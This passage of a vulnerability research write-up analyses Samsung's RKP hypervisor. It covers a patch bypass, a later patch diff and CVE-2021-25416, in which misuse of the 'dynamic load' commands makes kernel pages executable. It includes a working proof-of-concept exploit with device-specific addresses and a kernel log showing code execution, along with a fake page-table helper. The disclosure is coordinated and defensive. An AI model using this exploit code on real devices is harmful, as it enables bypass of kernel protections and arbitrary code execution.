Let's call the PA of the PMD descriptor pmd_desc_pa, the start VA of the region that it maps start_va, and the PA of our target page target_pa. To change the descriptor's value (from 0 to target_pa | 3), we can invoke the rkp_cmd_write_pgt2 command that calls rkp_l2pgt_write.

In rkp_l2pgt_write, since we are writing to an existing kernel PMD that is already marked as KERNEL|L2 in the physmap, the first check passes. And because the descriptor value changes from zero to a non-zero value, it only calls check_single_l2e once, with the new descriptor value.

In check_single_l2e, by choosing a start_va not contained in the executable_regions, the PXN bit of the new descriptor value is set and protect is set to false. Then, because the new descriptor is a table, rkp_l3pgt_process_table is called.

In rkp_l3pgt_process_table, because protect is false, the function returns early.

Finally, back in rkp_l2pgt_write, the new value of the descriptor is written.
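
As a rough sketch (untested, like the rest of this strategy), the write could be performed with the helpers from the earlier proof of concept; the RKP_CMD_WRITE_PGT2 command number is an assumption on our part, and pmd_desc_pa/target_pa stand for the device-specific values defined above.

#define RKP_CMD_WRITE_PGT2 0x04 /* assumed command number for rkp_cmd_write_pgt2 */

/* Turn the invalid PMD descriptor into a table descriptor pointing to our
 * target hypervisor page, which RKP will then treat as a kernel "fake PT". */
void install_fake_pt(uint64_t pmd_desc_pa, uint64_t target_pa) {
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT2,
                    pa_to_va(pmd_desc_pa), target_pa | 3UL);
}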

Remapping Memory As Writable

We are now ready to call the set_range_to_rox_l3 and set_range_to_pxn_l3 functions using the "dynamic load" commands that we will explain in the section about the next vulnerability. In particular, we use the subcommands dynamic_load_ins and dynamic_load_rm.

For reference, the code path that needs to be taken is as follows:

rkp_cmd_dynamic_load
`-- dynamic_load_ins
    |-- dynamic_load_check
    |     code range must be in the binary range
    |     must not overlap another "dynamic executable"
    |     must not be in the ro_bitmap
    |-- dynamic_load_protection
    |     will make the code range RO (and add it to ro_bitmap)
    |-- dynamic_load_verify_signing
    |     if type != 3, no signature checking
    |-- dynamic_load_make_rox
    |     calls rkp_set_range_to_rox!
    |-- dynamic_load_add_executable
    |     code range added to the executable_regions
    `-- dynamic_load_add_dynlist
          code range added to the dynamic_load_regions

rkp_cmd_dynamic_load
`-- dynamic_load_rm
    |-- dynamic_load_rm_dynlist
    |     code range is removed from dynamic_load_regions
    |-- dynamic_load_rm_executable
    |     code range is removed from executable_regions
    |-- dynamic_load_set_pxn
    |     calls rkp_set_range_to_pxn!
    `-- dynamic_load_rw
          will make the code range RW (and remove it from ro_bitmap)

It should be noted that, similarly to the original exploitation path, values in the target page that look like valid PT descriptors will have their PXN bit set. Thus, the target page needs to be writable. Nevertheless, we can continue to target the memory backing the protected_ranges memlist.

Second Patch

After being notified a second time by Samsung that the vulnerability was patched, we downloaded and binary diffed the most recent firmware update available for the Samsung Galaxy S10. The exact version used was G973FXXSEFUJ2.

Changes were made to the rkp_s2_page_change_permission function. It now calls check_kernel_input to ensure the physical address of the page is not in the protected_ranges memlist. This prevents targeting hypervisor memory with this function.

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
-                                      uint32_t exec,
-                                      uint32_t allow) {
+                                      uint32_t exec) {
  // ...

-  if (!allow && !rkp_inited) {
+  if (!rkp_deferred_inited) {
    // ...
  }
+  check_kernel_input(p_addr);
  // ...
}

This time, changes were also made to rkp_s2_range_change_permission. First, it calls protected_ranges_overlaps to ensure that the range does not overlap with the protected_ranges memlist. It then also ensures that none of the target pages are marked as S2UNMAP in the physmap.

int64_t rkp_s2_range_change_permission(uint64_t start_addr,
                                       uint64_t end_addr,
                                       uint64_t access,
                                       uint32_t exec,
                                       uint32_t allow) {
  // ...
-  if (!allow && !rkp_inited) {
-    uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
-    rkp_policy_violation("Range change permission prohibited");
-  } else if (allow != 2 && rkp_deferred_inited) {
-    uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
-    rkp_policy_violation("Range change permission prohibited");
-  }
+  if (rkp_deferred_inited) {
+    if (allow != 2) {
+      uh_log('L', "rkp_paging.c", 643, "RKP_33605b63");
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    if (start_addr > end_addr) {
+      uh_log('L', "rkp_paging.c", 650, "RKP_b3952d08%llxRKP_dd15365a%llx",
+             start_addr, end_addr - start_addr);
+      rkp_policy_violation("Range change permission prohibited");
+    }
+    protected_ranges_overlaps(start_addr, end_addr - start_addr);
+    addr = start_addr;
+    do {
+      rkp_phys_map_lock(addr);
+      if (is_phys_map_s2unmap(addr))
+        rkp_policy_violation("RKP_1b62896c %p", addr);
+      rkp_phys_map_unlock(addr);
+      addr += 0x1000;
+    } while (addr < end_addr);
+  }
  // ...
}

+int64_t protected_ranges_overlaps(uint64_t addr, uint64_t size) {
+    if (memlist_overlaps_range(&protected_ranges, addr, size)) {
+        uh_log('L', "pa_restrict.c", 122, "RKP_03f2763e%lx RKP_a54942c8%lx", addr, size);
+        return uh_log('D', "pa_restrict.c", 124, "RKP_03f2763e%lxRKP_c5d4b9a4%lx", addr, size);
+    }
+    return 0;
+}

Writing executable kernel pages

SVE-2021-20179 (CVE-2021-25416): Possible creating executable kernel page via abusing dynamic load functions

Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 5, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area.
The patch adds the proper address validation in RKP to prevent creating executable kernel page.

Vulnerability

We found this vulnerability while investigating the "dynamic load" feature of RKP. It allows the kernel to load into memory executable binaries that must be signed by Samsung. It is currently only used for the Fully Interactive Mobile Camera (FIMC) subsystem, and since this subsystem is only available on Exynos devices, this feature is not implemented for Snapdragon devices.

To understand how this feature works, we can start by looking at the kernel sources to find where it is used. By searching for the RKP_DYNAMIC_LOAD command, we can find two functions that load and unload "dynamic executables": fimc_is_load_ddk_bin and fimc_is_load_rta_bin.

In fimc_is_load_ddk_bin, the kernel starts by filling the rkp_dynamic_load_t structure with information about the binary. If the binary is already loaded, it invokes the RKP_DYN_COMMAND_RM subcommand to unload it. It then makes the whole binary memory writable and copies its code and data into it. Finally, it makes the binary code executable by invoking the RKP_DYN_COMMAND_INS subcommand.

int fimc_is_load_ddk_bin(int loadType)
{
    // ...
    rkp_dynamic_load_t rkp_dyn;
    static rkp_dynamic_load_t rkp_dyn_before = {0};
#endif
    // ...
    if (loadType == BINARY_LOAD_ALL) {
        memset(&rkp_dyn, 0, sizeof(rkp_dyn));
        rkp_dyn.binary_base = lib_addr;
        rkp_dyn.binary_size = bin.size;
        rkp_dyn.code_base1 = memory_attribute[INDEX_ISP_BIN].vaddr;
        rkp_dyn.code_size1 = memory_attribute[INDEX_ISP_BIN].numpages * PAGE_SIZE;
#ifdef USE_ONE_BINARY
        rkp_dyn.type = RKP_DYN_FIMC_COMBINED;
        rkp_dyn.code_base2 = memory_attribute[INDEX_VRA_BIN].vaddr;
        rkp_dyn.code_size2 = memory_attribute[INDEX_VRA_BIN].numpages * PAGE_SIZE;
#else
        rkp_dyn.type = RKP_DYN_FIMC;
#endif
        if (rkp_dyn_before.type)
            uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_RM,(u64)&rkp_dyn_before, 0, 0);
        memcpy(&rkp_dyn_before, &rkp_dyn, sizeof(rkp_dynamic_load_t));
        // ...
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_ISP_BIN]);
        // ...
#ifdef USE_ONE_BINARY
        ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_VRA_BIN]);
        // ...
#endif
        // ...
        memcpy((void *)lib_addr, bin.data, bin.size);
        // ...
        ret = uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, (u64)&rkp_dyn, 0, 0);
        // ...
}

The rkp_dynamic_load_t structure is filled with the type of the executable (RKP_DYN_FIMC if it has one code segment, RKP_DYN_FIMC_COMBINED if it has two), the base address and size of the whole binary, and the base address and size of its code segment(s).

typedef struct dynamic_load_struct{
    u32 type;
    u64 binary_base;
    u64 binary_size;
    u64 code_base1;
    u64 code_size1;
    u64 code_base2;
    u64 code_size2;
} rkp_dynamic_load_t;

In the hypervisor, the handler of the RKP_DYNAMIC_LOAD command and its subcommands is the rkp_cmd_dynamic_load function. It dispatches the subcommand (RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT, RKP_DYN_COMMAND_INS, or RKP_DYN_COMMAND_RM) to the appropriate function.

int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
  // ...

  // Get the subcommand and convert the argument structure address.
  type = regs->x2;
  rkp_dyn = (rkp_dynamic_load_t*)rkp_get_pa(regs->x3);
  // Call the handler specific to the subcommand type.
  if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
    res = dynamic_breakdown_before_init(rkp_dyn);
    if (res) {
      uh_log('W', "rkp_dynamic.c", 392, "dynamic_breakdown_before_init failed");
    }
  } else if (type == RKP_DYN_COMMAND_INS) {
    res = dynamic_load_ins(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 406, "dynamic_load ins type:%d success", rkp_dyn->type);
    }
  } else if (type == RKP_DYN_COMMAND_RM) {
    res = dynamic_load_rm(rkp_dyn);
    if (!res) {
      uh_log('L', "rkp_dynamic.c", 400, "dynamic_load rm type:%d success", rkp_dyn->type);
    }
  } else {
    res = 0;
  }
  // Put the return code in the memory referenced by x4.
  ret_va = regs->x4;
  if (ret_va) {
    *virt_to_phys_el1(ret_va) = res;
  }
  // Put the return code in x0.
  regs->x0 = res;
  return res;
}

The RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT subcommand is of no interest to us since it can only be called prior to initialization.

The RKP_DYN_COMMAND_INS subcommand, used to load a binary, is handled by dynamic_load_ins, which calls a bunch of functions sequentially.

If any of the functions it calls fails, except dynamic_load_check, it will try to undo its changes by calling the same functions as in the unloading path.

int64_t dynamic_load_ins(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Validate the argument structure.
  if (dynamic_load_check(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 273, "dynamic_load_check failed");
    return 0xf13c0001;
  }
  // Make the code segment(s) read-only executable in the stage 2.
  if (dynamic_load_protection(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 280, "dynamic_load_protection failed");
    res = 0xf13c0002;
    goto EXIT_RW;
  }
  // Verify the signature of the dynamic executable.
  if (dynamic_load_verify_signing(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 288, "dynamic_load_verify_signing failed");
    res = 0xf13c0003;
    goto EXIT_RW;
  }
  // Make the code segment(s) read-only executable in the stage 1.
  if (dynamic_load_make_rox(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 295, "dynamic_load_make_rox failed");
    res = 0xf13c0004;
    goto EXIT_SET_PXN;
  }
  // Add the code segment(s) to the executable_regions memlist.
  if (dynamic_load_add_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 303, "dynamic_load_add_executable failed");
    res = 0xf13c0005;
    goto EXIT_RM_EXECUTABLE;
  }
  // Add the binary's address range to the dynamic_load_regions memlist.
  if (dynamic_load_add_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 309, "dynamic_load_add_dynlist failed");
    res = 0xf13c0006;
    goto EXIT_RM_DYNLIST;
  }
  return 0;

EXIT_RM_DYNLIST:
  // Undo: remove the binary's address range from the dynamic_load_regions memlist.
  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 317, "fail to dynamic_load_rm_dynlist, later in dynamic_load_ins");
  }
EXIT_RM_EXECUTABLE:
  // Undo: remove the code segment(s) from the executable_regions memlist.
  if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 320, "fail to dynamic_load_rm_executable, later in dynamic_load_ins");
  }
EXIT_SET_PXN:
  // Undo: make the code segment(s) read-only non-executable in the stage 1.
  if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 323, "fail to dynamic_load_set_pxn, later in dynamic_load_ins");
  }
EXIT_RW:
  // Undo: make the code segment(s) read-write executable in the stage 2.
  if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 326, "fail to dynamic_load_rw, later in dynamic_load_ins");
  }
  return res;
}

The RKP_DYN_COMMAND_RM subcommand, used to unload a binary, is handled by dynamic_load_rm. It also calls a bunch of functions sequentially:

int64_t dynamic_load_rm(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Remove the binary's address range from the dynamic_load_regions memlist.
  if (dynamic_load_rm_dynlist(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 338, "dynamic_load_rm_dynlist failed");
    res = 0xf13c0007;
  }
  // Remove the code segment(s) from the executable_regions memlist.
  else if (dynamic_load_rm_executable(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 345, "dynamic_load_rm_executable failed");
    res = 0xf13c0008;
  }
  // Make the code segment(s) non-executable in the stage 1.
  else if (dynamic_load_set_pxn(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 352, "dynamic_load_set_pxn failed");
    res = 0xf13c0009;
  }
  // Make the code segment(s) read-write executable in the stage 2.
  else if (dynamic_load_rw(rkp_dyn)) {
    uh_log('W', "rkp_dynamic.c", 359, "dynamic_load_rw failed");
    res = 0xf13c000a;
  } else {
    res = 0;
  }
  return res;
}

Executable Loading

dynamic_load_check ensures that the binary's address range doesn't overlap with other currently loaded binaries or with memory that is read-only in the stage 2. Unfortunately, this is not enough. In particular, it doesn't ensure that the code segments are within the binary's address range. Please note that if pgt_bitmap_overlaps_range detects an overlap, uh_log is called with a D (debug) log level, which will result in a panic.

int64_t dynamic_load_check(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Dynamic executables of type RKP_DYN_MODULE are not allowed to be loaded.
  if (rkp_dyn->type == RKP_DYN_MODULE) {
    return -1;
  }
  // Check if the binary's address range overlaps with the dynamic_load_regions memlist.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('L', "rkp_dynamic.c", 71, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  // Check if any of the pages of the binary's address range is marked read-only in the ro_bitmap.
  if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('D', "rkp_dynamic.c", 76, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
  }
  return 0;
}

dynamic_load_protection makes the code segment(s) R-X in the stage 2 by calling rkp_s2_range_change_permission.

int64_t dynamic_load_protection(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment read-only executable in the second stage.
  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0x80 /* read-only */,
                                     1 /* executable */, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 116, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  // Make the second code segment read-only executable in the second stage.
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0x80 /* read-only */,
                                     1 /* executable */, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 124, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

dynamic_load_verify_signing verifies the signature of the whole binary's address space (remember that the binary's code and data were copied into that space by the kernel). Signature verification can be disabled by the kernel by setting NO_FIMC_VERIFY in the rkp_start command.

int64_t dynamic_load_verify_signing(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Check if signature verification was disabled by the kernel in rkp_start.
  if (NO_FIMC_VERIFY) {
    uh_log('L', "rkp_dynamic.c", 135, "FIMC Signature verification Skip");
    return 0;
  }
  // Only the signature of RKP_DYN_FIMC and RKP_DYN_FIMC_COMBINED dynamic executables is checked.
  if (rkp_dyn->type != RKP_DYN_FIMC && rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  // Call fmic_signature_verify that does the actual signature checking.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  if (fmic_signature_verify(binary_base_pa, rkp_dyn->binary_size)) {
    uh_log('W', "rkp_dynamic.c", 143, "FIMC Signature verification failed %lx, %lx", binary_base_pa,
           rkp_dyn->binary_size);
    return -1;
  }
  uh_log('L', "rkp_dynamic.c", 146, "FIMC Signature verification Success %lx, %lx", rkp_dyn->binary_base,
         rkp_dyn->binary_size);
  return 0;
}

dynamic_load_make_rox makes the code segment(s) R-X in the stage 1 by calling rkp_set_range_to_rox.

int64_t dynamic_load_make_rox(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment read-only executable in the first stage.
  res = rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Make the second code segment read-only executable in the first stage.
    res += rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}

dynamic_load_add_executable adds the code segment(s) to the list of executable memory regions.

int64_t dynamic_load_add_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Add the first code segment to the executable_regions memlist.
  res = memlist_add(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Add the second code segment to the executable_regions memlist.
    res += memlist_add(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2);
  }
  return res;
}

dynamic_load_add_dynlist adds the binary's address range to the list of dynamically loaded executables.

int64_t dynamic_load_add_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Allocate a copy of the argument structure.
  dynlist_entry = static_heap_alloc(0x38, 0);
  memcpy(dynlist_entry, rkp_dyn, 0x38);
  // Add the binary's address range to the dynamic_load_regions memlist and save the binary information alongside.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  return memlist_add_extra(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, dynlist_entry);
}

Executable Unloading

dynamic_load_rm_dynlist removes the binary's address range from the list of dynamically loaded executables.

int64_t dynamic_load_rm_dynlist(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Remove the binary's address range from the dynamic_load_regions memlist and retrieve the saved binary information.
  binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
  res = memlist_remove_exact(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, &dynlist_entry);
  if (res) {
    return res;
  }
  if (!dynlist_entry) {
    uh_log('W', "rkp_dynamic.c", 205, "No dynamic descriptor");
    return -11;
  }
  // Compare the first code segment base address and size with the saved binary information.
  res = 0;
  if (rkp_dyn->code_base1 != dynlist_entry->code_base1 || rkp_dyn->code_size1 != dynlist_entry->code_size1) {
    --res;
  }
  // Compare the second code segment base address and size with the saved binary information.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED &&
      (rkp_dyn->code_base2 != dynlist_entry->code_base2 || rkp_dyn->code_size2 != dynlist_entry->code_size2)) {
    --res;
  }
  // Free the copy of the argument structure.
  static_heap_free(dynlist_entry);
  return res;
}

dynamic_load_rm_executable removes the code segment(s) from the list of executable memory regions.

int64_t dynamic_load_rm_executable(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Remove the first code segment from the executable_regions memlist.
  res = memlist_remove_exact(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1, 0);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Remove the second code segment from the executable_regions memlist.
    res += memlist_remove_exact(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2, 0);
  }
  return res;
}

dynamic_load_set_pxn makes the code segment(s) non-executable in the stage 1 by calling rkp_set_range_to_pxn.

int64_t dynamic_load_set_pxn(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment non-executable in the first stage.
  res = rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
    // Make the second code segment non-executable in the first stage.
    res += rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
  }
  return res;
}

dynamic_load_rw makes the code segment(s) RWX in the stage 2 by calling rkp_s2_range_change_permission.

int64_t dynamic_load_rw(rkp_dynamic_load_t* rkp_dyn) {
  // ...

  // Make the first code segment read-write executable in the second stage.
  code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
  if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0 /* read-write */,
                                     1 /* executable */, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 239, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
           rkp_dyn->code_size1);
    return -1;
  }
  // Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
  if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
    return 0;
  }
  // Make the second code segment read-write executable in the second stage.
  code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
  if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0, 1, 2) < 0) {
    uh_log('L', "rkp_dynamic.c", 247, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
           rkp_dyn->code_size2);
    return -1;
  }
  return 0;
}

Vulnerability

From the high-level description of the functions given above, we can notice in particular that if we give a code segment that is currently R-X or RW- in the stage 2, dynamic_load_protection will make it R-X. And if an error occurs after that, dynamic_load_rw will be called to undo the changes and make it RWX, regardless of the original permissions. Thus, we can effectively make kernel memory executable.

In practice, to pass the checks in dynamic_load_check, we need to specify a binary_base that is in writable memory in the stage 2, but code_base1 and code_base2 can be in read-only memory. Now, to trigger a failure, we can specify a code_base2 that is not page-aligned. That way, the second call to rkp_s2_range_change_permission in dynamic_load_protection will fail, and dynamic_load_rw will be executed. The second call to rkp_s2_range_change_permission in dynamic_load_rw will also fail, but that's not an issue.

Exploitation

The vulnerability allows us to change memory that is currently R-X or RW- in the stage 2 to RWX. In order to execute arbitrary code at EL1 using this vulnerability, the simplest way is to find a physical page that is already executable in the stage 1, so that we only have to modify the stage 2 permissions. Then we can use the virtual address of this page in the kernel's physmap (the Linux kernel physmap, not RKP's physmap) as a second mapping that is writable. By writing our code to this second mapping and executing it from the first, we can achieve arbitrary code execution.

          stage 1   stage 2
 EXEC_VA ---------+--------> TARGET_PA
            R-X   |   R-X
                  |    ^---- will be changed to RWX
WRITE_VA ---------+
            RW-

By dumping the page tables of the stage 1, we can easily find a double-mapped page.

...
ffffff80fa500000 - ffffff80fa700000 (PTE): R-X at 00000008f5520000 - 00000008f5720000
...
ffffffc800000000 - ffffffc880000000 (PMD): RW- at 0000000880000000 - 0000000900000000
...

If we pick 0xFFFFFF80FA6FF000 (inside the R-X region starting at 0xFFFFFF80FA500000) as our executable mapping, we can deduce that the corresponding writable mapping will be at 0xFFFFFFC87571F000:

>>> EXEC_VA = 0xFFFFFF80FA6FF000
>>> TARGET_PA = EXEC_VA - 0xFFFFFF80FA500000 + 0x00000008F5520000
>>> TARGET_PA
0x8F571F000
>>> WRITE_VA = 0xFFFFFFC800000000 + TARGET_PA - 0x0000000880000000
>>> WRITE_VA
0xFFFFFFC87571F000

And by dumping the page tables of the stage 2, we can confirm that it is initially mapped as R-X.

...
0x8f571f000-0x8f5720000: S2AP=1, XN[1]=0
...

The last important thing we need to take into account when writing our exploit is the caches (data and instruction). To be safe, we decided to prefix the code to execute with some "bootstrap" instructions that will clean the caches.

Proof of Concept

#define UH_APP_RKP 0xC300C002

#define RKP_DYNAMIC_LOAD      0x20
#define RKP_DYN_COMMAND_INS   0x01
#define RKP_DYN_FIMC_COMBINED 0x03

/* these 2 VAs point to the same PA */
#define EXEC_VA  0xFFFFFF80FA6FF000UL
#define WRITE_VA 0xFFFFFFC87571F000UL

/* bootstrap code to clean the caches */
#define DC_IVAC_IC_IVAU 0xD50B7520D5087620UL
#define DSB_ISH_ISB     0xD5033FDFD5033B9FUL
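/* Decoded by hand (worth double-checking with a disassembler); each constant
   packs two little-endian AArch64 instructions:
     0xD5087620: dc ivac, x0    0xD50B7520: ic ivau, x0
     0xD5033B9F: dsb ish        0xD5033FDF: isb */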

void exploit() {
    /* fill the structure given as argument */
    uint64_t rkp_dyn = kernel_alloc(0x38);
    kernel_write(rkp_dyn + 0x00, RKP_DYN_FIMC_COMBINED); // type
    kernel_write(rkp_dyn + 0x08, kernel_alloc(0x1000));  // binary_base
    kernel_write(rkp_dyn + 0x10, 0x1000);                // binary_size
    kernel_write(rkp_dyn + 0x18, EXEC_VA);               // code_base1
    kernel_write(rkp_dyn + 0x20, 0x1000);                // code_size1
    kernel_write(rkp_dyn + 0x28, EXEC_VA + 1);           // code_base2
    kernel_write(rkp_dyn + 0x30, 0x1000);                // code_size2

    /* call the hypervisor to make the page RWX */
    kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, rkp_dyn);

    /* copy the code using the writable mapping */
    uint32_t code[] = {
        0xDEADBEEF,
        0,
    };
    kernel_write(WRITE_VA + 0x00, DC_IVAC_IC_IVAU);
    kernel_write(WRITE_VA + 0x08, DSB_ISH_ISB);
    for (int i = 0; i < sizeof(code) / sizeof(uint64_t); ++i)
        kernel_write(WRITE_VA + 0x10 + i * 8, ((uint64_t *)code)[i]);

    /* and execute it using the executable mapping */
    kernel_exec(EXEC_VA, WRITE_VA);
}

As a result of running the proof of concept, we get an undefined instruction exception that we can observe in the kernel log (note the (deadbeef) part):

<2>[  207.365236]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault = UNDF / 0xffffff80fa6ff018
<2>[  207.365310]  [3:     rkp_exploit:15549] sec_debug_set_extra_info_fault: 0x1 / 0x726ff018
<0>[  207.365338]  [3:     rkp_exploit:15549] undefined instruction: pc=00000000dec42a2e, rkp_exploit[15549] (esr=0x2000000)
<6>[  207.365361]  [3:     rkp_exploit:15549] Code: d5087620 d50b7520 d5033b9f d5033fdf (deadbeef)
<0>[  207.365372]  [3:     rkp_exploit:15549] Internal error: undefined instruction: 2000000 [#1] PREEMPT SMP
<4>[  207.365386]  [3:     rkp_exploit:15549] Modules linked in:
<0>[  207.365401]  [3:     rkp_exploit:15549] Process rkp_exploit (pid: 15549, stack limit = 0x00000000b4f56d76)
<0>[  207.365418]  [3:     rkp_exploit:15549] debug-snapshot: core register saved(CPU:3)
<0>[  207.365430]  [3:     rkp_exploit:15549] L2ECTLR_EL1: 0000000000000007
<0>[  207.365438]  [3:     rkp_exploit:15549] L2ECTLR_EL1 valid_bit(30) is NOT set (0x0)
<0>[  207.365456]  [3:     rkp_exploit:15549] CPUMERRSR: 0000000000040001, L2MERRSR: 0000000013000000
<0>[  207.365468]  [3:     rkp_exploit:15549] CPUMERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365480]  [3:     rkp_exploit:15549] L2MERRSR valid_bit(31) is NOT set (0x0)
<0>[  207.365491]  [3:     rkp_exploit:15549] debug-snapshot: context saved(CPU:3)
<6>[  207.365541]  [3:     rkp_exploit:15549] debug-snapshot: item - log_kevents is disabled
<6>[  207.365574]  [3:     rkp_exploit:15549] TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 89
<4>[  207.365590]  [3:     rkp_exploit:15549] CPU: 3 PID: 15549 Comm: rkp_exploit Tainted: G        W       4.14.113 #14
<4>[  207.365602]  [3:     rkp_exploit:15549] Hardware name: Samsung A51 EUR OPEN REV01 based on Exynos9611 (DT)
<4>[  207.365617]  [3:     rkp_exploit:15549] task: 00000000dcac38cb task.stack: 00000000b4f56d76
<4>[  207.365632]  [3:     rkp_exploit:15549] PC is at 0xffffff80fa6ff018
<4>[  207.365644]  [3:     rkp_exploit:15549] LR is at 0xffffff80fa6ff004

The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1. The two-fold bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Implement thorough checking in the "dynamic executable" commands:
    - The code segment(s) should not overlap any read-only pages
    (maybe checking the ro_bitmap or calling is_phys_map_free is enough)
    - dynamic_load_rw should not make the code segment(s) executable on failure
    (to prevent abusing it to create executable kernel pages...)
